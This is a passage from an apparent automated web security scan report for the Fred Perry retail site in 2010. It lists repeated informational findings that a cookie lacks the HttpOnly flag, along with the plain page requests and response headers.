Date: Tue, 09 Nov 2010 16:17:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7kd0hn8okv5rqjjcp2un0pfra6; expires=Tue, 09-Nov-2010 17:17:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.fredperry.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


6.13. http://www.fredperry.com/checkout/cart/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/cart/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:15:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dogceop16qjgqg80nuf0jem260; expires=Tue, 09-Nov-2010 17:15:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...

6.14. http://www.fredperry.com/contacts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /contacts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contacts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3mj4cdg20qdm247mvjc6pepd07; expires=Tue, 09-Nov-2010 17:14:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...

6.15. http://www.fredperry.com/customercare/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1tfuufp4eqg670sli4jn4qs542; expires=Tue, 09-Nov-2010 17:13:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...

6.16. http://www.fredperry.com/customercare/delivery/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/delivery/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lqtjusfje49qs8qfm9b3jvsrd1; expires=Tue, 09-Nov-2010 17:14:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Deliver
...[SNIP]...

6.17. http://www.fredperry.com/customercare/deliverylate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/deliverylate/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gqo991dbglao1e34i6fhgjt434; expires=Tue, 09-Nov-2010 17:14:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Late De
...[SNIP]...

6.18. http://www.fredperry.com/customercare/faq/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/faq/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9ob37fjg76o97s0kphrvsosup2; expires=Tue, 09-Nov-2010 17:13:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Frequen
...[SNIP]...

6.19. http://www.fredperry.com/customercare/information/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/information/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m40lhjk1892gk3mn4li1ls2sm7; expires=Tue, 09-Nov-2010 17:14:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Customs
...[SNIP]...

6.20. http://www.fredperry.com/customercare/ordertracking/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/ordertracking/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=to8kvlk1fif8g75fn01tesc915; expires=Tue, 09-Nov-2010 17:14:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Order T
...[SNIP]...

6.21. http://www.fredperry.com/customercare/returns/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/returns/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v6rbp3o6tgiot9u6dp0p22ctq4; expires=Tue, 09-Nov-2010 17:14:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Returns
...[SNIP]...

6.22. http://www.fredperry.com/footwear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:57:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3r1it3pofgpvngtukp6j746v86; expires=Tue, 09-Nov-2010 16:57:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> footwea
...[SNIP]...

6.23. http://www.fredperry.com/footwear/men/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /footwear/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2ticko8ic5v7jatuh3o1nhvrg3; expires=Tue, 09-Nov-2010 16:56:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's F
...[SNIP]...

6.24. http://www.fredperry.com/footwear/women/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /footwear/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=157a08jjiscuuiu6s8kl72pdt2; expires=Tue, 09-Nov-2010 16:56:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.25. http://www.fredperry.com/heritage/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /heritage/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /heritage/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=aahnr9m6livg8d48om6p1islf4; expires=Tue, 09-Nov-2010 17:12:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Heritag
...[SNIP]...

6.26. http://www.fredperry.com/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sgna25rkqa8aq8ttcgdssdl6p2; expires=Tue, 09-Nov-2010 17:16:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.27. http://www.fredperry.com/js/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: must-revalidate
Last-modified: Thu, 20 May 2010 11:06:23 +0000
Expires: Wed, 09 Nov 2011 15:45:19 +0000
Content-Type: text/javascript
Content-Length: 399652

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype we
...[SNIP]...

6.28. http://www.fredperry.com/kids/kidswear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kids/kidswear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:15:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fn32chemjgdr3t0veiuc0qrpj2; expires=Tue, 09-Nov-2010 17:15:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Kidswea
...[SNIP]...

6.29. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kids/my-first-fred-perry-shirt-overview/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qqsmus516r13ou38et52qd0l51; expires=Tue, 09-Nov-2010 17:16:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> My Firs
...[SNIP]...

6.30. http://www.fredperry.com/limited-edition/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1bcn29ltg4p3bi0p6q0vc3b0o6; expires=Tue, 09-Nov-2010 17:02:54 GMT; path=/; domain=www.fredperry.com
